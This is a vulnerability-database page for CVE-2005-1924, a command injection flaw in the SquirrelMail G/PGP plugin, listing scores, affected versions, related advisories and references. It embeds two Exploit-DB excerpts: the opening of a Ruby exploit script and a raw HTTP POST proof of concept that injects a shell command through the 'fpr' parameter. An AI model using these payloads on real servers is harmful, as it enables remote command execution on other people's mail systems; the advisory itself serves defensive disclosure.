CVE-2005-1924
published 2005-12-31CVE-2005-1924: The G/PGP (GPG) Plugin 2.1 and earlier for Squirrelmail allow remote authenticated users to execute arbitrary commands via shell metacharacters in (1) the fpr…
PriorityP346critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
10.26%
95.1th percentile
The G/PGP (GPG) Plugin 2.1 and earlier for Squirrelmail allow remote authenticated users to execute arbitrary commands via shell metacharacters in (1) the fpr parameter to the deleteKey function in gpg_keyring.php, as called by (a) import_key_file.php, (b) import_key_text.php, and (c) keyring_main.php; and (2) the keyserver parameter to the gpg_recv_key function in gpg_key_functions.php, as called by gpg_options.php. NOTE: this issue may overlap CVE-2007-3636.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| squirrelmail | gpg_plugin | <= 2.1 | — |
| squirrelmail | gpg_plugin | — | — |
| squirrelmail | squirrelmail | — | — |
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
CVE-2007-3635: Multiple unspecified vulnerabilities in the G/PGP (GPG) Plugin before 2
vendor_redhat·CVSS 9.3
CVE-2007-3635 [CRITICAL] CVE-2007-3635: Multiple unspecified vulnerabilities in the G/PGP (GPG) Plugin before 2
Multiple unspecified vulnerabilities in the G/PGP (GPG) Plugin before 2.1 for Squirrelmail might allow "local authenticated users" to inject certain commands via unspecified vectors. NOTE: this might overlap CVE-2005-1924, CVE-2006-4169, or CVE-2007-3634.
Statement: Not vulnerable. This plugin is not shipped with Squirrelmail in Red Hat Enterprise Linux.
GHSA
GHSA-87rp-52qv-ghjc: The G/PGP (GPG) Plugin 2
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2005-1924 [HIGH] GHSA-87rp-52qv-ghjc: The G/PGP (GPG) Plugin 2
The G/PGP (GPG) Plugin 2.1 and earlier for Squirrelmail allow remote authenticated users to execute arbitrary commands via shell metacharacters in (1) the fpr parameter to the deleteKey function in gpg_keyring.php, as called by (a) import_key_file.php, (b) import_key_text.php, and (c) keyring_main.php; and (2) the keyserver parameter to the gpg_recv_key function in gpg_key_functions.php, as called by gpg_options.php. NOTE: this issue may overlap CVE-2007-3636.
GHSA
GHSA-qxqw-pch2-xr57: Multiple unspecified vulnerabilities in the G/PGP (GPG) Plugin before 2
ghsa_unreviewed·2022-05-01·CVSS 9.3
CVE-2007-3635 [CRITICAL] GHSA-qxqw-pch2-xr57: Multiple unspecified vulnerabilities in the G/PGP (GPG) Plugin before 2
Multiple unspecified vulnerabilities in the G/PGP (GPG) Plugin before 2.1 for Squirrelmail might allow "local authenticated users" to inject certain commands via unspecified vectors. NOTE: this might overlap CVE-2005-1924, CVE-2006-4169, or CVE-2007-3634.
No detection rules found.
Exploit-DB
SquirrelMail G/PGP Encryption Plugin - 'deletekey()' Command Injection
exploitdb·2007-12-11
CVE-2005-1924 SquirrelMail G/PGP Encryption Plugin - 'deletekey()' Command Injection
SquirrelMail G/PGP Encryption Plugin - 'deletekey()' Command Injection
---
#!/usr/local/bin/ruby
puts"http://backdoored.net\n"
puts "SquirrelMail G/PG deletekey() command injection exploit\n"
puts "http://backdoored.net Visit Us\n"
puts "Coded by Backdoored member. \n"
puts "--------------------------------------------------\n"
if ARGV[0] == nil && ARGV[1] == nil && ARGV[2] == nil && ARGV[3] == nil && ARGV[4] == nil && ARGV[5] == nil
puts "Usage: ./squ_xploit hostname path port cookie command 0\n"
puts "if host using ssl use 1 instead of 0\n"
exit
end
require 'net/http'
require 'net/https'
host = ARGV[0].to_s
port = ARGV[2].to_i
cookie = ARGV[3].to_s
victim = Net::HTTP.new(host,port)
if ARGV[3].to_i == 1
puts "Entering SSL mode baby\n"
victim.use_ssl = true
end
command = ARGV[4].to_s
Exploit-DB
SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution
exploitdb·2007-07-11
CVE-2005-1924 SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution
SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution
---
SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability
Bugtraq ID: 24782
There are various vulnerabilities in this software! One is in
keyring_main.php!
$fpr is not escaped from shellcommands!
testbox:/home/w00t# cat /tmp/w00t
cat: /tmp/w00t: No such file or directory
testbox:/home/w00t#
***@silverlaptop:~$ nc *** 80
POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1
Host: ***
User-Agent: w00t
Keep-Alive: 300
Connection: keep-alive
Cookie: Authentication Data for SquirrelMail
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
id=C5B1611B8E71C***&fpr= | touch /tmp/w00t |
&pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1
...
No writeups or analysis indexed.
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=329http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=331http://osvdb.org/37923http://osvdb.org/37924http://secunia.com/advisories/26035http://secunia.com/advisories/26424http://security.gentoo.org/glsa/glsa-200708-08.xmlhttp://www.attrition.org/pipermail/vim/2007-July/001710.htmlhttp://www.securityfocus.com/archive/1/473370/100/0/threadedhttp://www.securityfocus.com/bid/24874http://www.vupen.com/english/advisories/2007/2513https://exchange.xforce.ibmcloud.com/vulnerabilities/35355https://exchange.xforce.ibmcloud.com/vulnerabilities/35364https://www.exploit-db.com/exploits/4173http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=329http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=331http://osvdb.org/37923http://osvdb.org/37924http://secunia.com/advisories/26035http://secunia.com/advisories/26424http://security.gentoo.org/glsa/glsa-200708-08.xmlhttp://www.attrition.org/pipermail/vim/2007-July/001710.htmlhttp://www.securityfocus.com/archive/1/473370/100/0/threadedhttp://www.securityfocus.com/bid/24874http://www.vupen.com/english/advisories/2007/2513https://exchange.xforce.ibmcloud.com/vulnerabilities/35355https://exchange.xforce.ibmcloud.com/vulnerabilities/35364https://www.exploit-db.com/exploits/4173
2005-12-31
Published